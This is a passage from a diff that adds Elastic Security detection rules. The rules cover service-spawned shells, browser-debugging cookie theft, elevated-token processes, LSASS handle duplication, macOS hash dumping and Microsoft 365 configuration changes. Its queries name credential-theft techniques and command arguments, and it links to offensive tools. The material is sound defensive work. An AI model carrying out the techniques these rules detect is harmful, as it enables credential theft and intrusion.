this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check for commands executed under the spawned shell.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"services.exe\" and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n\n /* Third party FP's */\n not process.args : \"NVDisplay.ContainerLocalSystem\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "0022d47d-39c7-4f69-a232-4fe9dc7a3acd", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "0022d47d-39c7-4f69-a232-4fe9dc7a3acd_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_103.json b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_103.json new file mode 100644 index 00000000000..2d78d99c09e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_103.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when a user has been restricted from sending email due to exceeding sending limits of the service policies per the Security Compliance Center.", + "false_positives": [ + "A user sending emails using personal distribution folders may trigger the event." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 User Restricted from Sending Email", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"User restricted from sending email\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "0136b315-b566-482f-866c-1d8e2477ba16", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "0136b315-b566-482f-866c-1d8e2477ba16_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_105.json b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_105.json new file mode 100644 index 00000000000..2c2df5b5bfe --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_105.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when a user has been restricted from sending email due to exceeding sending limits of the service policies per the Security Compliance Center.", + "false_positives": [ + "A user sending emails using personal distribution folders may trigger the event." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 User Restricted from Sending Email", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"User restricted from sending email\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "0136b315-b566-482f-866c-1d8e2477ba16", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "0136b315-b566-482f-866c-1d8e2477ba16_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_206.json b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_206.json new file mode 100644 index 00000000000..673e6919743 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_206.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when a user has been restricted from sending email due to exceeding sending limits of the service policies per the Security Compliance Center.", + "false_positives": [ + "A user sending emails using personal distribution folders may trigger the event." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 User Restricted from Sending Email", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"User restricted from sending email\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "0136b315-b566-482f-866c-1d8e2477ba16", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "0136b315-b566-482f-866c-1d8e2477ba16_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_105.json b/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_105.json new file mode 100644 index 00000000000..1a73939d6f8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_105.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a Chromium based browser with the debugging process argument, which may indicate an attempt to steal authentication cookies. An adversary may steal web application or service session cookies and use them to gain access web applications or Internet services as an authenticated user without needing credentials.", + "false_positives": [ + "Developers performing browsers plugin or extension debugging." + ], + "from": "now-9m", + "index": [ + "auditbeat-*", + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "Potential Cookies Theft via Browser Debugging", + "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n process.name in (\n \"Microsoft Edge\",\n \"chrome.exe\",\n \"Google Chrome\",\n \"google-chrome-stable\",\n \"google-chrome-beta\",\n \"google-chrome\",\n \"msedge.exe\") and\n process.args : (\"--remote-debugging-port=*\",\n \"--remote-debugging-targets=*\",\n \"--remote-debugging-pipe=*\") and\n process.args : \"--user-data-dir=*\" and not process.args:\"--remote-debugging-port=0\"\n", + "references": [ + "https://github.com/defaultnamehere/cookie_crimes", + "https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/", + "https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/chrome_cookies.md", + "https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "027ff9ea-85e7-42e3-99d2-bbb7069e02eb", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1539", + "name": "Steal Web Session Cookie", + "reference": "https://attack.mitre.org/techniques/T1539/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 105 + }, + "id": "027ff9ea-85e7-42e3-99d2-bbb7069e02eb_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_6.json b/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_6.json new file mode 100644 index 00000000000..4852b3b5c32 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_6.json @@ -0,0 +1,112 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a process running as SYSTEM and impersonating a Windows core binary privileges. Adversaries may create a new process with a different token to escalate privileges and bypass access controls.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Created with an Elevated Token", + "query": "/* This rule is only compatible with Elastic Endpoint 8.4+ */\n\nprocess where host.os.type == \"windows\" and event.action == \"start\" and\n\n /* CreateProcessWithToken and effective parent is a privileged MS native binary used as a target for token theft */\n user.id : \"S-1-5-18\" and\n\n /* Token Theft target process usually running as service are located in one of the following paths */\n process.Ext.effective_parent.executable :\n (\"?:\\\\Windows\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*\") and\n\n/* Ignores Utility Manager in Windows running in debug mode */\n not (process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\System32\\\\Utilman.exe\" and\n process.parent.executable : \"?:\\\\Windows\\\\System32\\\\Utilman.exe\" and process.parent.args : \"/debug\") and\n\n/* Ignores Windows print spooler service with correlation to Access Intelligent Form */\nnot (process.parent.executable : \"?\\\\Windows\\\\System32\\\\spoolsv.exe\" and\n process.executable: \"?:\\\\Program Files*\\\\Access\\\\Intelligent Form\\\\*\\\\LaunchCreate.exe\") and \n\n/* Ignores Windows error reporting executables */\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\windows\\\\system32\\\\WerMgr.exe\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\securityhealthsetup.exe\") and\n\n /* Ignores Windows updates from TiWorker.exe that runs with elevated privileges */\n not (process.parent.executable : \"?:\\\\Windows\\\\WinSxS\\\\*\\\\TiWorker.exe\" and\n process.executable : (\"?:\\\\Windows\\\\Microsoft.NET\\\\Framework*.exe\",\n \"?:\\\\Windows\\\\WinSxS\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\iissetup.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\inetsrv\\\\iissetup.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\aspnetca.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\inetsrv\\\\aspnetca.exe\",\n \"?:\\\\Windows\\\\System32\\\\lodctr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\lodctr.exe\",\n \"?:\\\\Windows\\\\System32\\\\netcfg.exe\",\n \"?:\\\\Windows\\\\Microsoft.NET\\\\Framework*\\\\*\\\\ngen.exe\",\n \"?:\\\\Windows\\\\Microsoft.NET\\\\Framework*\\\\*\\\\aspnet_regiis.exe\")) and\n\n\n/* Ignores additional parent executables that run with elevated privileges */\n not process.parent.executable : \n (\"?:\\\\Windows\\\\System32\\\\AtBroker.exe\", \n \"?:\\\\Windows\\\\system32\\\\svchost.exe\", \n \"?:\\\\Program Files (x86)\\\\*.exe\", \n \"?:\\\\Program Files\\\\*.exe\", \n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\DriverStore\\\\*\") and\n\n/* Ignores Windows binaries with a trusted signature and specific signature name */\n not (process.code_signature.trusted == true and\n process.code_signature.subject_name : \n (\"philandro Software GmbH\", \n \"Freedom Scientific Inc.\", \n \"TeamViewer Germany GmbH\", \n \"Projector.is, Inc.\", \n \"TeamViewer GmbH\", \n \"Cisco WebEx LLC\", \n \"Dell Inc\"))\n", + "references": [ + "https://lengjibo.github.io/token/", + "https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createprocesswithtokenw" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.effective_parent.executable", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "02a23ee7-c8f8-4701-b99d-e9038ce313cb", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.002", + "name": "Create Process with Token", + "reference": "https://attack.mitre.org/techniques/T1134/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "02a23ee7-c8f8-4701-b99d-e9038ce313cb_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_208.json b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_208.json new file mode 100644 index 00000000000..c57f3d8d643 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_208.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious access to an LSASS handle via DuplicateHandle from an unknown call trace module. This may indicate an attempt to bypass the NtOpenProcess API to evade detection and dump LSASS memory for credential access.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Credential Access via DuplicateHandle in LSASS", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n\n /* LSASS requesting DuplicateHandle access right to another process */\n process.name : \"lsass.exe\" and winlog.event_data.GrantedAccess == \"0x40\" and\n\n /* call is coming from an unknown executable region */\n winlog.event_data.CallTrace : \"*UNKNOWN*\"\n", + "references": [ + "https://github.com/CCob/MirrorDump" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallTrace", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.GrantedAccess", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "02a4576a-7480-4284-9327-548a806b5e48", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 208 + }, + "id": "02a4576a-7480-4284-9327-548a806b5e48_208", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_106.json b/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_106.json new file mode 100644 index 00000000000..2dea41db489 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_106.json @@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of macOS built-in commands used to dump user account hashes. Adversaries may attempt to dump credentials to obtain account login information in the form of a hash. These hashes can be cracked or leveraged for lateral movement.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Dumping Account Hashes via Built-In Commands", + "query": "event.category:process and host.os.type:macos and event.type:start and\n process.name:(defaults or mkpassdb) and process.args:(ShadowHashData or \"-dump\")\n", + "references": [ + "https://apple.stackexchange.com/questions/186893/os-x-10-9-where-are-password-hashes-stored", + "https://www.unix.com/man-page/osx/8/mkpassdb/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "02ea4563-ec10-4974-b7de-12e65aa4f9b3", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "02ea4563-ec10-4974-b7de-12e65aa4f9b3_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_103.json b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_103.json new file mode 100644 index 00000000000..c506239682e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_103.json @@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a safe attachment rule is disabled in Microsoft 365. Safe attachment rules can extend malware protections to include routing all messages and attachments without a known malware signature to a special hypervisor environment. An adversary or insider threat may disable a safe attachment rule to exfiltrate data or evade defenses.", + "false_positives": [ + "A safe attachment rule may be disabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Safe Attachment Rule Disabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Disable-SafeAttachmentRule\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safeattachmentrule?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "03024bd9-d23f-4ec1-8674-3cf1a21e130b", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "03024bd9-d23f-4ec1-8674-3cf1a21e130b_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_105.json b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_105.json new file mode 100644 index 00000000000..9bfbb70fdd6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_105.json @@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a safe attachment rule is disabled in Microsoft 365. Safe attachment rules can extend malware protections to include routing all messages and attachments without a known malware signature to a special hypervisor environment. An adversary or insider threat may disable a safe attachment rule to exfiltrate data or evade defenses.", + "false_positives": [ + "A safe attachment rule may be disabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Safe Attachment Rule Disabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Disable-SafeAttachmentRule\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safeattachmentrule?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + 